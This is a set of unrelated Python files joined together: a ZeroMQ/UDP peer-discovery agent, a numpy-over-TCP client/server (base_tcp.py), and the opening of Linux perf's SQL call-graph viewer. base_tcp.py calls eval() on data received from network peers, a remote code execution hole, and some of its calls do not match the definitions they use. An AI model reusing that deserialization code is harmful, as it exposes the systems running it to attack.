if self.requestpipe:
self.requestpipe.close()
if self.agent:
self.agent.stop()
self.agent = None
print(f"Closed Agent", flush=True)
if self.ctx:
self.ctx.destroy()
def start(self):
print(f"Start Discovery here", flush=True)
self.beacon.run()
if self.node.settings.discoverable == True:
self.make_discoverable(True)
# if not (self.agent_thread and self.agent_thread.is_alive()):
if not self.agent or not self.agent_thread.is_alive():
self.ctx = zmq.Context()
p0, p1 = pipe(self.ctx)
p2, p3 = pipe(self.ctx)
self.agent = DiscoveryAgent(self.ctx, self.node, p1, p3)
self.agent.udp.broadcast = self.broadcast
self.agent_thread = Thread(target=self.agent.start, daemon=True)
self.agent_thread.start()
self.pipe = p0
self.requestpipe = p2
self.nodecb.start()
self.networkcb.start()
def update_port(self, port):
if self.beacon.port != port:
self.beacon.port = port
if self.node.settings.discoverable == True:
self.beacon.update()
def update_name(self, name):
self.beacon.update_name(name)
if self.node.settings.discoverable == True:
self.beacon.update()
def make_discoverable(self, val):
# print(f"Make discoverable: {val}",flush=True)
if val:
self.beacon.register()
else:
self.beacon.unregister()
def send(self, evt):
self.pipe.send_multipart(evt)
def recv(self):
"""receive a message from our interface"""
return self.pipe.recv_multipart()
def nodes(self):
if self.node.settings.discovery == True:
return self.cached_peers
else:
return []
# return [{"uuid": self.node.model.uuid, "name": self.node.name, "ip": self.beacon.local_ip}]
# return [self.node.model.to_json(only = [Node.uuid, Node.name])]
def request(self, msg):
if not self.requestpipe:
raise AncillaError(400, {"error": "Discovery is not running"})
self.requestpipe.send_multipart(msg)
reply = self.requestpipe.recv_multipart()
kind, msg = reply
return msg.decode('utf-8')
def stop_checking(self):
self.nodecb.stop()
msg = [self.node.identity + b'.notifications.nodes_changed', b'check', b'{"nodes":"check"}']
if hasattr(self.node, 'publisher'):
self.node.publisher.send_multipart(msg)
def check_nodes(self):
res = self.request([b'peers'])
new_peers = json.loads(res)
if self.cached_peers != new_peers:
self.cached_peers = new_peers
msg = [self.node.identity + b'.notifications.nodes_changed', b'check', b'{"nodes":"check"}']
self.node.publisher.send_multipart(msg)
def check_interface_addresses(self):
## The uap0 interface is used by our wifi docker container as a wifi access point (allows incoming connections)
## wlan0 interface is used as the client to connect to outside wifi
accesspointinterface = 'uap0'
gws = netifaces.gateways()
interfaces = netifaces.interfaces()
# list(filter(lambda x: netifaces.AF_INET in netifaces.ifaddresses(x), interfaces))
default_interface = None
address = None
broadcast = None
used_interface = ''
# if netifaces.AF_INET in gws['default']:
i = gws['default'].get(netifaces.AF_INET) or ()
if len(i) > 1:
default_interface = i[1]
if default_interface:
netaddress = netifaces.ifaddresses(default_interface).get(netifaces.AF_INET) or []
if len(netaddress) > 0:
addrdict = (netaddress[0] or {})
addr = addrdict.get('addr')
if addr and not addr.startswith('127'):
used_interface = f'DefaultGateway {default_interface}'
address = addr
if addrdict.get('broadcast'):
broadcast = addrdict.get('broadcast')
docker_address = None
if not address:
for face in interfaces:
addrs = (netifaces.ifaddresses(face).get(netifaces.AF_INET) or [])
for addrdict in addrs:
addr = addrdict.get('addr')
if not address and addr and not addr.startswith('127'):
if face.startswith('docker'):
docker_address = addr
else:
used_interface = face
address = addr
if addrdict.get('broadcast'):
broadcast = addrdict.get('broadcast')
if not address:
try:
used_interface = 'sockethostname'
address = socket.gethostbyname_ex(socket.gethostname())[-1][0]
except Exception as e:
print(f"NoAddress {str(e)}")
address = '127.0.0.1'
# print(f"Face: {used_interface} curadd= {self.current_address} address = {address}, currentbroad: {self.broadcast} bcast= {broadcast}", flush=True)
return address, broadcast
def check_network(self):
# print(f"CHECK NETWORK {threading.currentThread()}", flush=True)
adr, bcast = self.check_interface_addresses()
self.broadcast = bcast or '255.255.255.255'
if self.agent and self.agent.udp.broadcast != self.broadcast:
print(f"broadcast change: bcast udp: {self.agent.udp.broadcast} to: {self.broadcast}", flush=True)
self.agent.udp.broadcast = self.broadcast
if self.current_address != adr or (self.beacon and self.beacon.address != adr):
self.current_address = adr
if self.beacon:
self.beacon.close()
self.beacon = None
self._update_timeout = time.time() + 3.0
if self.update_beacon_timeout:
self.update_beacon_timeout.cancel()
self.update_beacon_timeout = IOLoop.current().add_timeout(self._update_timeout, partial(self.update_beacon, adr))
def update_beacon(self, adr):
try:
print(f'Updating Beacon {self.current_address}, New: {adr}')
self.beacon = Beacon(self.node.name, port=self.node.api_port, address=adr)
self.beacon.update_network(self.node.settings.discovery, self.node.settings.discoverable)
self.current_address = adr
except Exception as e:
print(f'BeaconUpdate Exception: {str(e)}')
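# Minimal sketch (illustration only; the helper name is hypothetical) of the
# netifaces lookup pattern used in Discovery.check_interface_addresses: find
# the default IPv4 gateway's interface, then read its address and broadcast.
def _default_ipv4_address():
    gw_entry = netifaces.gateways().get('default', {}).get(netifaces.AF_INET) or ()
    if len(gw_entry) > 1:
        iface = gw_entry[1]
        addrs = netifaces.ifaddresses(iface).get(netifaces.AF_INET) or []
        if addrs:
            return addrs[0].get('addr'), addrs[0].get('broadcast')
    return None, None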
# =====================================================================
# Asynchronous part, works in the background
PING_PORT_NUMBER = 9999
PING_INTERVAL = 1.0 # Ping once per second
PEER_EXPIRY = 11.0 # 11 seconds and it's gone
UUID_BYTES = 32
class Peer(object):
uuid = None
name = None
ip = None
expires_at = None
def __init__(self, agent, uuid, name, ip, port):
self.agent = agent
self.uuid = uuid
self.name = name
self.ip = ip
self.port = port
self.is_alive()
# self.ctx = zmq.Context()
# self.setup_dealer()
def setup_dealer(self):
peer = self.ctx.socket(zmq.DEALER) # DEALER
target_identity = self.uuid.encode('ascii')
peer.setsockopt(zmq.IDENTITY, self.agent.uuid.encode('ascii'))
connect_address = f'tcp://{self.ip}:{self.port}'
print(f'Peer Connect Address = {connect_address}')
self.peer = ZMQStream(peer)
self.peer.connect(connect_address)
self.peer.on_send(self.peer_message)
self.peer.send_multipart([target_identity, b"state", b'blah'])
self.peer.send_multipart([target_identity, b"ICANHAZ?", b'tada'])
def is_alive(self, *args):
"""Reset the peers expiry time
Call this method whenever we get any activity from a peer.
"""
if len(args) > 0:
uuid, name, port, ip, *rest = args
self.name = name
self.ip = ip
self.expires_at = time.time() + PEER_EXPIRY
def peer_message(self, msg, other):
print('Received Peer Message', flush=True)
def to_json(self):
return {"uuid": self.uuid, "name": self.name, "ip": self.ip}
class DiscoveryAgent(object):
"""This structure holds the context for our agent so we can
pass that around cleanly to methods that need it
"""
ctx = None # ZMQ context
pipe = None # Pipe back to application
udp = None # UDP object
uuid = None # Our UUID as binary blob
peers = None # Hash of known peers, fast lookup
def __init__(self, ctx, node, pipe, request, loop=None):
self.ctx = ctx
self.node = node
self.pipe = pipe
self.request = request
self.loop = loop
# self.udp = udp
self.udp = UDP(PING_PORT_NUMBER)
# self.uuid = uuid.uuid4().hex.encode('utf8')
self.uuid = self.node.model.uuid # uuid.uuid4().hex
self.peers = {}
def stop(self):
self.stream.close()
if self.reappc:
self.reappc.stop()
if self.pingpc:
self.pingpc.stop()
self.udp.close()
self.udp = None
self.loop.stop()
def __del__(self):
try:
self.stop()
except:
pass
def start(self):
# asyncio.set_event_loop_policy(AnyThreadEventLoopPolicy())
if self.loop is None:
if not IOLoop.current(instance=False):
self.loop = IOLoop()
else:
self.loop = IOLoop.current()
loop = self.loop
loop.add_handler(self.udp.handle.fileno(), self.handle_beacon, loop.READ)
self.stream = ZMQStream(self.request, loop)
self.stream.on_recv(self.control_message)
self.pingpc = PeriodicCallback(self.send_ping, PING_INTERVAL * 4000, 0.1)
self.pingpc.start()
self.reappc = PeriodicCallback(self.reap_peers, PING_INTERVAL * 5000, 0.1)
self.reappc.start()
loop.start()
def send_ping(self, *a, **kw):
# print(f'Send Ping here ', flush=True)
if not self.node.settings.discoverable:
return
try:
packet = json.dumps([self.uuid, self.node.name, self.node.router_port]).encode('utf-8')
self.udp.send(packet)
except Exception as e:
print(f'Ping Exception = {str(e)}')
def control_message(self, event):
"""Here we handle the different control messages from the frontend."""
action, *res = event
if action == b'peers':
p = [p.to_json() for p in self.peers.values()]
t = [b'peers', json.dumps(p, cls=ServiceJsonEncoder).encode('utf-8')]
self.request.send_multipart(t)
else:
print("control message: %s"%event)
def handle_beacon(self, fd, event):
# uuid = self.udp.recv(UUID_BYTES)
packet, ip = self.udp.recv(128)
pack = packet.decode('utf-8')
try:
res = json.loads(pack)
uuid = res[0]
name = res[1]
port = res[2]
if uuid in self.peers:
# print(f'Beacon: {res}')
self.peers[uuid].is_alive(*res, ip)
else:
# if uuid == self.uuid:
# print(f'Same Node')
# return
print("Found peer %s, %s, %s" % (uuid, name, ip))
self.peers[uuid] = Peer(self, uuid, name, ip, port)
self.pipe.send_multipart([b'JOINED', uuid.encode('utf-8')])
except Exception as e:
print(f'handle beacon exception = {str(e)}')
def reap_peers(self):
now = time.time()
for peer in list(self.peers.values()):
if peer.expires_at < now:
print("reaping %s" % peer.uuid, peer.expires_at, now)
self.peers.pop(peer.uuid)
self.pipe.send_multipart([b'LEFT', peer.uuid.encode('utf-8')])
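# Beacon packet sketch (illustration only; the function name is hypothetical):
# each UDP ping is a JSON-encoded [uuid, name, port] triple, which is the
# shape send_ping() emits and handle_beacon() expects to parse.
def _example_beacon_packet(uuid_hex, name, port):
    packet = json.dumps([uuid_hex, name, port]).encode('utf-8')
    assert json.loads(packet.decode('utf-8')) == [uuid_hex, name, port]
    return packet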
base_tcp.py
import socket, threading
import numpy as np
import time
from ..import_basic_utils import *
from .base import BasObj
def recvall(sock, count):
buf = b''
while count:
newbuf = sock.recv(count)
if not newbuf: return None
buf += newbuf
count -= len(newbuf)
return buf
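# Framing sketch (illustration only; helper names are hypothetical): messages
# on these sockets are a 16-byte zero-padded ASCII length header followed by
# the payload, and recvall() above reassembles both pieces on the receiving end.
def _send_framed(sock, payload):
    header = str(len(payload)).rjust(16, '0').encode()
    sock.sendall(header + payload)

def _recv_framed(sock):
    length = recvall(sock, 16)
    if length is None:
        return None
    return recvall(sock, int(length))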
def send_result(s, inf):
s.send(inf.encode())
def byte2dict(byteData):
byte_dict = eval(byteData.decode())
data_dict = dict()
for key in byte_dict:
item = byte_dict[key]
data = item['data']
if item['is_array']: data = np.fromstring(data, dtype=item['dtype']).reshape(item['shape'])
data_dict.update({key: data})
return data_dict
def dict2byte(data_dict):
out_dict = dict()
for key in data_dict:
value = data_dict[key]
is_array = isinstance(value, np.ndarray)
shape, dtype = None, None
if is_array:
shape, dtype = value.shape, value.dtype.name
value = value.tostring()
out_dict.update({key: {'is_array': is_array, 'shape': shape, 'dtype':dtype, 'data':value}})
return str(out_dict).encode()
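# Round-trip sketch for the dict <-> bytes helpers above (illustration only;
# the function name is hypothetical): numpy arrays survive the trip with their
# shape and dtype intact, plain values are passed through unchanged.
def _dict_byte_roundtrip_example():
    original = {'image': np.arange(6, dtype=np.uint8).reshape(2, 3), 'label': 'cat'}
    restored = byte2dict(dict2byte(original))
    assert restored['label'] == 'cat'
    assert np.array_equal(restored['image'], original['image'])
    return restored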
def ndarray2byteDict(mat):
return {'size': mat.shape, 'dtype': mat.dtype.name, 'bytes': mat.tostring()}
def byteDict2mat(byteDict):
return np.fromstring(byteDict['bytes'], dtype=byteDict['dtype']).reshape(byteDict['size'])
class ServerThread():
def __init__(self, host='localhost', port=8888):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((host, port))
def listen(self):
print('{} listening for a connection'.format('+'*10))
self.sock.listen(1)
while True:
self.client, self.address = self.sock.accept()
self.client.settimeout(1200) # time out after 20 mins
threading.Thread(target = self.listenToClient).start()
def listenToClient(self):
while True:
try:
print('{} waiting data'.format('+'*10))
self.length = recvall(self.client, 16)
if self.length is None:
raise ConnectionError('Client disconnected')
else:
print('{} Connected to {}'.format('+'*10,self.address))
byteData = self.receive_data()
self.data = byte2dict(byteData=byteData)
print('{} Data received'.format('+'*10))
rets = self.process_received_data()
print('{} Data processed'.format('+'*10))
self.send_return(rets)
print('{} Return sent'.format('+'*10))
time.sleep(2)
ProcUtils().clscr()
except:
self.client.close()
return False
def receive_data(self):
byteData = recvall(self.client, int(self.length))
return byteData
# return self.get_data(byteData=byteData)
def process_received_data(self):
return self.data
def send_return(self, rets):
byteRets= dict2byte(data_dict=rets)
byteLen = str(len(byteRets)).rjust(16, '0').encode()
self.client.sendall(byteLen + byteRets)
class ClientThread():
def __init__(self, host='localhost', port=8888):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.host = host
self.port = port
self.server_connected = False
def send_and_get_return(self, aDict):
""" send a dict to sever"""
while True:
try:
if not self.server_connected:
print('{} Connecting to server: {}'.format('+'*10,self.host))
self.sock.connect((self.host, self.port))
print('Connected ....')
self.server_connected = True
self.send_dict(aDict=aDict)
return self.get_return()
except:
self.sock.close()
print('socket closed ...')
return None
def send_dict(self, aDict):
print('{} Sending byte data'.format('+' * 10))
byteData = dict2byte(data_dict=aDict)
len_byte = str(len(byteData)).rjust(16, '0').encode()
self.sock.send(len_byte + byteData)
print('Byte data sent...')
def get_return(self):
print('{} Waiting for return'.format('+' * 10))
ret_len = recvall(self.sock, 16)
byteData = recvall(self.sock, int(ret_len))
print('Return received ...')
return byte2dict(byteData=byteData)
class DetectTcpServer():
def __init__(self, args=None, cfg_path=None, detector=None, detector_reload=None):
if cfg_path is not None: args = CFG(cfg_path=cfg_path)
self.args = args
self.detector = detector
self.detector_reload = detector_reload
def predict(self, inputs):
return self.detector(inputs)
def run(self):
server = ServerThread(host='', port=self.args.port, detector=self.predict, detector_reload=self.detector_reload)
server.listen()
class DetectTcpClient():
def predict(self, inputs, filename='unnamed'):
for name in inputs:
if not isinstance(inputs[name], np.ndarray):continue
inputs[name] = ndarray2bytes(inputs[name])
inputs.update({'args': str(self.args.todict())})
byteData = str(inputs).encode()
byteRets = ClientThread(self.args.host, self.args.port).sendMessage(byteData)
# rets = pickle.loads(byteRets)
if byteRets is None: return None
rets = eval(byteRets.decode())
if not isinstance(rets, (list, tuple)): rets = [rets]
for i in range(len(rets)):
ret = rets[i]
for name in ret:
if not isinstance(ret[name], bytes): continue
rets[i][name] = bytes2ndarray(ret[name])
return rets
def run(self):
server = ServerThread(host='', port=self.args['port'], detector=self.predict)
server.listen()
def ndarray2bytes(mat):
info = mat.dtype.name
for s in mat.shape:
info+= '_' + str(s)
info = info.ljust(32, '$')
return info.encode() + mat.tostring()
def bytes2ndarray(byteData):
info = byteData[:32].decode()
info = info[:info.find('$')]
info = tuple(el for el in info.split('_'))
shape = tuple(int(el) for el in info[1:])
data_type = info[0]
return np.fromstring(byteData[32:], dtype=data_type).reshape(shape)
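# Round-trip sketch for the header-prefixed array helpers above (illustration
# only; the function name is hypothetical; assumes the dtype/shape header fits
# in the 32-byte prefix).
def _ndarray_bytes_roundtrip_example():
    mat = np.linspace(0.0, 1.0, 12, dtype=np.float32).reshape(3, 4)
    restored = bytes2ndarray(ndarray2bytes(mat))
    assert restored.dtype == np.float32 and restored.shape == (3, 4)
    assert np.allclose(restored, mat)
    return restored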
if __name__=='__main__':
pass
exported-sql-viewer.py
#!/usr/bin/env python2
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _dl_init_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
pyside_version_1 = True
from decimal import *
from ctypes import *
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
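# Usage sketch for the background Thread wrapper above (illustration only;
# the helper name is hypothetical): the task returns (done, result) tuples,
# results are delivered to the GUI thread through the 'done' signal, and the
# thread exits once the task reports done=True. This mirrors how Find() uses
# it further below.
def RunTaskInBackground(task, on_result, parent=None):
	thread = Thread(task, parent=parent)
	thread.done.connect(on_result, Qt.QueuedConnection)
	thread.start()
	return thread # keep a reference so the QThread is not garbage collected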
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
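# Usage sketch (illustration only; the function name is hypothetical): the
# cache keys models by name, so repeated lookups reuse the same instance for
# as long as something else still holds a reference to it.
def LookupCreateModelExample(glb):
	model = LookupCreateModel("CallGraphModel", lambda: CallGraphModel(glb))
	again = LookupCreateModel("CallGraphModel", lambda: CallGraphModel(glb))
	return model is again # True while the first reference is alive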
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox);
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data == None:
self.textbox.setItemData(index, pattern)
else:
self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, row, parent_item):
self.glb = glb
self.row = row
self.parent_item = parent_item
self.query_done = False;
self.child_count = 0
self.child_items = []
if parent_item:
self.level = parent_item.level + 1
else:
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True;
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time), SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
child_item = CallGraphLevelThreeItem(self.glb, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), int(query.value(5)), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, call_path_id, name, dso, count, time, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, row, comm_id, thread_id, call_path_id, time, branch_count, parent_item)
dso = dsoname(dso)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, row, comm_id, thread_id, pid, tid, parent_item):
